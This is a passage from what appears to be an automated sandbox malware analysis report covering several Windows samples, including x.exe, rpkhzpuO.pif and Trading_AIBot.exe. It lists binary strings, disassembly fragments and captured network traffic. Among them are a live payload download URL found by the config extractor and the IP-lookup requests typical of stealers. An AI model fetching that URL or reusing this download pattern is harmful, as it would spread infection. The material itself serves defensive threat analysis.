0000001A.00000002.2639575698.000000002D083000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001A.00000003.2417739511.000000002B351000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001F.00000002.2695514518.000000002EA63000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001F.00000002.2698667477.000000002ECD0000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 0000001F.00000003.2505077127.000000002D0EA000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001F.00000002.2700260465.000000002FD95000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdbXa source: rpkhzpuO.pif, 0000001A.00000003.2462367771.000000002B3DC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000002.2212967585.0000000020800000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F260000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168492490.00000000217A2000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168492490.00000000217D1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000002.2209421224.0000000000AE0000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020819000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303256685.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303256685.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000016.00000003.2401750651.0000000000893000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000016.00000003.2401750651.0000000000864000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2494620308.0000000000992000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2494620308.0000000000963000.00000004.00000020.00020000.00000000.sdmp
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B258B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,4_2_02B258B4
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 02587394h9_2_02587188
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 0258778Ch9_2_02587538
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h9_2_02587E60
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 0258778Ch9_2_02587528
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h9_2_02587E5E
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h9_2_02587F0F
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 02835782h10_2_02835366
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 028351B9h10_2_02834F08
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 02835782h10_2_028356AF

                        Networking

                        barindex
                        Source: Malware configuration extractorURLs: https://lwaziacademy.com/wps/200_Oupzhkprnvw
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B3E2F0 InternetCheckConnectionA,4_2_02B3E2F0
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                        Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                        Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                        Source: Joe Sandbox ViewASN Name: GridhostZA GridhostZA
                        Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                        Source: unknownDNS query: name: checkip.dyndns.org
                        Source: unknownDNS query: name: reallyfreegeoip.org
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 41.185.8.252:443
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49720 -> 193.122.130.0:80
                        Source: global trafficHTTP traffic detected: GET /wps/200_Oupzhkprnvw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: lwaziacademy.com
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49726 version: TLS 1.0
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /wps/200_Oupzhkprnvw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: lwaziacademy.com
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficDNS traffic detected: DNS query: lwaziacademy.com
                        Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                        Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                        Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                        Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                        Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.00000000029D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                        Source: Microsofts.exe, 0000000A.00000002.3379727606.00000000029D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                        Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                        Source: rpkhzpuO.pif, 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, Microsofts.exe.8.drString found in binary or memory: http://checkip.dyndns.org/q
                        Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                        Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                        Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2173229317.0000000021F41000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2173659376.000000007EC0A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.00000000208A6000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif.4.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                        Source: powershell.exe, 0000000B.00000002.2417126655.0000000006E8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microb
                        Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                        Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                        Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                        Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                        Source: powershell.exe, 0000000B.00000002.2394103071.0000000005395000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                        Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2173229317.0000000021F41000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2173659376.000000007EC0A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.00000000208A6000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif.4.drString found in binary or memory: http://ocsp.comodoca.com0$
                        Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
